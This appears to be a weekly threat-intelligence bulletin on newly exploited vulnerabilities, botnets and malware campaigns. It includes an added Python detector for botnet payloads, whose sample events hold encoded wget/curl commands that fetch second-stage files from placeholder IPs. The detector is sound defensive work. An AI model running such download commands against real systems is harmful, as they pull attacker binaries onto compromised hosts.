Executive Summary
The cybersecurity threat landscape continues to evolve at an alarming pace. CISA has expanded its KEV catalog with four new vulnerabilities, including two in Palo Alto Networks and one each in SonicWall and Craft CMS, alongside ongoing exploitation of Microsoft Power Pages. Meanwhile, the agency’s latest #StopRansomware advisory highlights the growing threat of Ghost (Cring) Ransomware.
Botnets continue to evolve, with EnemyBot and Sysrv-K exploiting weaknesses in Spring Cloud Gateway, while Mozi, Androxgh0st, Tsunami, Spytech Necro, and Sysrv intensify attacks on Atlassian products.
Advanced malware threats are also on the rise, with SPAWN malware leveraging a zero-day in Ivanti Connect Secure. ASEC warns of an evolving delivery mechanism for the Rhadamanthys infostealer, signaling a shift in cybercriminal tactics. Furthermore, Green Nailao, a newly identified campaign, has been exploiting a Check Point security flaw to infiltrate European healthcare organizations and deploy sophisticated malware strains such as NailaoLocker ransomware.
With adversaries becoming increasingly strategic, organizations must reinforce their defenses to stay ahead of these ever-evolving cyber threats.
Trending / Critical Vulnerabilities
Current trending vulnerabilities offer insights into the latest emerging and widely discussed threats, helping to make informed decisions.
An Authentication Bypass Vulnerability in the Palo Alto Networks PAN-OS Software, with a high CVSS Score of 8.8, allows unauthorized access, posing risks to the integrity and confidentiality of affected systems. This vulnerability was initially discovered by Assetnote researchers during an analysis of patches for CVE-2024-0012 and CVE-2024-9474, both of which were actively exploited in November 2024. To further highlight the urgency of patching, Assetnote publicly released a proof-of-concept (PoC) exploit, making unpatched systems even more exposed. Given its security implications, this vulnerability has been added to CISA's Known Exploited Vulnerabilities (KEV) catalog.
A File-Read Vulnerability in Palo Alto Networks PAN-OS allows an authenticated attacker with network access to the management web interface to read files accessible by the "nobody" user. Palo Alto Networks addressed the flaw on February 12, 2025, but later updated its advisory to confirm active exploitation in the wild. With a high CVSS Score of 7.1, this vulnerability is being chained with CVE-2025-0108 and CVE-2024-9474, enabling more complex attack scenarios. As a result, CISA has added this vulnerability to its KEV catalog, urging organizations to apply patches immediately.
A Code Injection Vulnerability in Craft CMS allows for remote code execution (RCE) in Craft 4 and 5 installations where the security key has already been compromised. With a CVSS score of 8.0 (High), this flaw enables attackers to execute arbitrary code, putting affected systems at risk. Patched versions 4.13.8 and 5.5.8 have been released to mitigate the threat. Recognizing its exploitation potential, CISA has added this vulnerability to its KEV catalog, urging immediate updates.
An Elevation of Privilege Vulnerability in Microsoft Power Pages stems from improper access control within the low-code platform used for creating, hosting, and managing secure business websites. With a high CVSS Score of 8.2, this flaw allows an unauthorized attacker to elevate privileges over a network and bypass user registration controls, potentially compromising affected systems. Microsoft classified this vulnerability with an "Exploitation Detected" assessment, confirming at least one known instance of active exploitation. A security update has been released, and organizations are urged to apply the patch promptly to mitigate the risk.
An Improper Authentication Vulnerability in the SonicWall SonicOS SSLVPN authentication mechanism allows remote attackers to bypass authentication, posing a severe security risk. Rated CVSS 9.8 (Critical), this flaw was identified by Bishop Fox researchers, who successfully exploited it on unpatched SonicWall firewalls. Shortly after a proof-of-concept (PoC) exploit was made public, Arctic Wolf observed active exploitation attempts in the wild. In response, SonicWall rolled out multiple patched versions to mitigate the threat. Due to its severity and active exploitation, the vulnerability has been added to the CISA KEV catalog.
Exploit Activity and Mass Scanning Observed on Cytellite Sensors
Telemetry collected from Loginsoft sensors was analyzed and processed to derive insights into what is actively being exploited and actively being scanned. As a source of truth, source IPv4 addresses and payloads can be provided on a need-to-know basis.
Vulnerabilities abused by Botnet
This section lists vulnerabilities identified as exploited by botnets, including recent CVEs logged in MISP. It presents the top 5 CVEs whose payloads are suggestive of botnet activity, such as using wget to fetch a second stage from a raw IP address.
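One way to apply the heuristic described above (payloads that fetch a second stage with wget or curl from a bare IPv4 host) to captured sensor payloads, as an added example that is not Loginsoft's own tooling; the events, CVE ids and IP addresses below are constructed placeholders, and the top-N ranking mirrors the "top 5 CVEs" view this section presents.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Dotted-quad IPv4 literal (each octet 0-255).
_IPV4 = r"(?:25[0-5]|2[0-4]\d|1?\d?\d)(?:\.(?:25[0-5]|2[0-4]\d|1?\d?\d)){3}"
# wget/curl followed, within the same shell command, by a URL or bare token
# whose host is an IPv4 literal rather than a hostname.
_FETCH = re.compile(
    r"\b(wget|curl)\b[^;|&\n]{0,80}?(?:https?://|\s)(" + _IPV4 + r")\b",
    re.IGNORECASE,
)


def normalise(payload: str) -> str:
    """Strip up to two layers of percent-encoding and collapse whitespace."""
    for _ in range(2):
        decoded = unquote(payload)
        if decoded == payload:
            break
        payload = decoded
    return " ".join(payload.split())


def botnet_indicators(payload: str):
    """Return (tool, ip) pairs for each wget/curl fetch from a bare IPv4 host."""
    return [(m.group(1).lower(), m.group(2)) for m in _FETCH.finditer(normalise(payload))]


def top_botnet_cves(events, n: int = 5):
    """events: iterable of (cve_id, raw_payload). Rank CVEs by botnet-suggestive hits."""
    counts = Counter()
    for cve, payload in events:
        if botnet_indicators(payload):
            counts[cve] += 1
    return counts.most_common(n)


# Constructed sample events: placeholder CVE ids and documentation-range IPs.
SAMPLE_EVENTS = [
    ("CVE-PLACEHOLDER-1", "cmd=wget%20http%3A%2F%2F198.51.100.23%2Fbins.sh"),
    ("CVE-PLACEHOLDER-1", "cmd=curl%20-s%20http%3A%2F%2F203.0.113.9%3A8080%2Fx86"),
    ("CVE-PLACEHOLDER-2", "cmd=curl%2520http%253A%252F%252F203.0.113.9%252Fa"),  # double-encoded
    ("CVE-PLACEHOLDER-3", "cmd=wget%20http%3A%2F%2Fupdates.example.net%2Fa"),     # hostname, not counted
    ("CVE-PLACEHOLDER-3", "id=1&name=bob"),                                        # benign
]

if __name__ == "__main__":
    for cve, hits in top_botnet_cves(SAMPLE_EVENTS):
        print(cve, hits)
```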
Vulnerabilities Abused by Malware
We proactively monitor the vulnerabilities that are targeted by adversaries. Each vulnerability is manually studied and mapped to MITRE ATT&CK tactics and techniques. The information is derived from our vulnerability intelligence platform, which collects and curates data from sources such as Twitter, Telegram, OSINT groups, blogs, data leak sites, and more.
Cybersecurity researchers at JPCERT/CC have identified a significant evolution in the SPAWN malware family with the emergence of SPAWNCHIMERA, a more advanced and evasive variant. This new strain is actively exploiting CVE-2025-0282, a buffer overflow vulnerability in Ivanti Connect Secure, which was publicly disclosed in January 2025. Notably, SPAWNCHIMERA was detected in attacks prior to the vulnerability's disclosure, highlighting a sophisticated shift in tactics and potential zero-day exploitation.
Cyber defense analysts have uncovered a previously unknown threat activity cluster targeting European organizations, with a particular focus on the healthcare sector. This campaign, dubbed Green Nailao by Orange Cyberdefense CERT, involved the deployment of PlugX and its successor ShadowPad, sophisticated malware variants often linked to advanced persistent threats (APTs). In some instances, these intrusions escalated to the deployment of NailaoLocker ransomware. The attacks, observed between June and October 2024, leveraged CVE-2024-24919, a recently patched vulnerability in Check Point network gateway security products.
AhnLab Security Emergency Response Center (ASEC) has issued an alert regarding a newly identified distribution method for the Rhadamanthys infostealer, a malware designed to extract sensitive data from compromised systems. This latest technique leverages MSC extension files, a format commonly associated with the Microsoft Management Console (MMC). Researchers have categorized MSC malware into two types: one variant exploits a vulnerability in apds.dll (CVE-2024-43572), while the other executes commands using Console Taskpad. Since June 2024, the prevalence of MSC-based malware has surged, with the CVE-2024-43572-exploiting variant emerging as the most widespread threat.
CISA Warns Against Ghost (Cring) Ransomware Exploits
The US Cybersecurity and Infrastructure Security Agency (CISA) has issued a Cybersecurity Advisory as part of its ongoing #StopRansomware initiative, providing critical insights for network defenders. The advisory focuses on Ghost (Cring) ransomware, which has been observed exploiting multiple vulnerabilities in Adobe, Microsoft, and Fortinet to gain initial access, posing significant risks to organizations.
PRE-NVD observed for this week
PRE-NVD refers to vulnerabilities discovered and potentially exploited before their official inclusion in the National Vulnerability Database. The LOVI Platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts and planning to expand.
External References
- https://arcticwolf.com/resources/blog/cve-2024-53704/
- https://www.cisa.gov/news-events/alerts/2025/02/18/cisa-adds-two-known-exploited-vulnerabilities-catalog
- https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-050a
- https://www.cisa.gov/news-events/alerts/2025/02/20/cisa-adds-two-known-exploited-vulnerabilities-catalog
- https://www.security.com/threat-intelligence/chinese-espionage-ransomware
- https://blogs.jpcert.or.jp/ja/2025/02/spawnchimera.html
- https://asec.ahnlab.com/en/86391/
- https://www.orangecyberdefense.com/global/blog/cert-news/meet-nailaolocker-a-ransomware-distributed-in-europe-by-shadowpad-and-plugx-backdoors